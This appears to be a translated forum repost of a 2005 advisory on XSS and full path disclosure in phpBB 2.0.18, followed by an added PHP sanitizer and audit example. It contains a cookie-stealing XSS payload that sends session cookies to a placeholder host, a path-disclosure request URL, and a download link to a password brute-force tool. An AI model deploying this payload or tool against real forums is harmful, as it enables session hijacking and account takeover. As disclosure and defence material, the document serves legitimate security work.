phpBB 2.0.18 XSS and Full Path Disclosure
Details: SecurityAlert
There is also a brute-force cracking tool; it is single-threaded and of no great use. It is a matter of fact, what phpBB can be used to run passwords?
Download: http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar
Topic: phpBB 2.0.18 XSS and Full Path Disclosure
SecurityAlert Id: 269
SecurityRisk: Low
Remote Exploit: Yes
Local Exploit: No
Exploit Given: Yes
Credit: Maksymilian Arciemowicz
Date: 17.12.2005
Affected Software: phpBB <= 2.0.18
Advisory Text:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
From securityreason.com TEAM
---- 0. Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board
package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL,
MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community
solution for all web sites.
Contact with author http://www.phpbb.com/about.php.
---- 1. XSS ---
If "Allowed HTML tags" is ON in phpBB for tags such as b, i, u, pre, and you have "Always allow HTML: YES" set in your profile, or you are a Guest,
then you can use these tags:
<B c=">" onmouseover="alert('securityreason.com')" X="<B"> h e l o </B>
Exploit:
<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> h a l o </B>
And you have the cookies.
---- 2. Full Path Disclosure ---
The file admin/admin_disallow.php contains:
--25-31 ---
if (!empty($setmodules))
{
    $filename = basename(__FILE__);
    $module['users']['disallow'] = append_sid($filename);
    return;
}
--25-31 ---
The function append_sid() doesn't exist. And if you have:
register_globals = On
display_errors = On
try to go to:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
--Result error ---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disallow.php on line 28
--Result error ---
---- 3. Greets ---
Sp3x
---- 4. Contact ---
Author: Maksymilian Arciemowicz <cXIb8O3>
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
Securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
ID8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q =
= LsL8
-----END PGP SIGNATURE-----
Oh, by the way, as for the one at the top, I guess it means:
Personalized signature:
The personalized signature you entered is automatically included at the bottom of your published article. A personalized signature can contain 512 characters.
Disable HTML tags
Allowed style labels
Emoticon icons allowed
Find "HTML tags allowed"
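
A defensive counterpart to the sample in section 1 of the advisory, added here as an example and not taken from phpBB or from the advisory: escape the whole post, then re-enable only attribute-free pairs of the tags the advisory names, and flag stored posts whose allowed tags carry anything after the tag name. The function names and the sample posts are constructed for illustration; PHP 7.4 or later is assumed.

```php
<?php
declare(strict_types=1);

// Added example, not phpBB code. Tag list taken from section 1 of the advisory.
const ALLOWED_TAGS = ['b', 'i', 'u', 'pre'];

/** Alternation of the allowed tag names for use inside a regex. */
function tag_alternation(): string
{
    return implode('|', array_map('preg_quote', ALLOWED_TAGS));
}

/** Escape everything, then restore only bare <tag>...</tag> pairs. */
function sanitize_post(string $post): string
{
    // Quotes are escaped too, so no tag or attribute context survives.
    $out = htmlspecialchars($post, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // After escaping, an attribute-free pair looks like &lt;b&gt;...&lt;/b&gt;.
    $pair = '#&lt;(' . tag_alternation() . ')&gt;(.*?)&lt;/\1&gt;#is';
    do {
        // Repeat so pairs nested inside a restored pair are restored as well.
        $next = preg_replace($pair, '<$1>$2</$1>', $out, -1, $count);
        if ($next === null) {
            break; // regex engine error: keep the fully escaped text
        }
        $out = $next;
    } while ($count > 0);
    return $out;
}

/** Audit helper: true when an allowed tag is followed by attribute-like text. */
function has_tag_attributes(string $post): bool
{
    return preg_match('#<(?:' . tag_alternation() . ')\s+[^\s>]#i', $post) === 1;
}

// Constructed sample posts; the second is the alert() sample from section 1.
$samples = [
    'plain allowed tags' => '<b>hello <i>world</i></b> <pre>x < y</pre>',
    'advisory sample'    => '<B c=">" onmouseover="alert(\'securityreason.com\')" X="<B"> h e l o </B>',
];
foreach ($samples as $label => $post) {
    printf("%s\n  flagged: %s\n  output:  %s\n", $label,
        var_export(has_tag_attributes($post), true), sanitize_post($post));
}
```

Because a closing tag is restored only together with a bare opening tag, the advisory sample comes out fully escaped, while the first sample keeps its formatting.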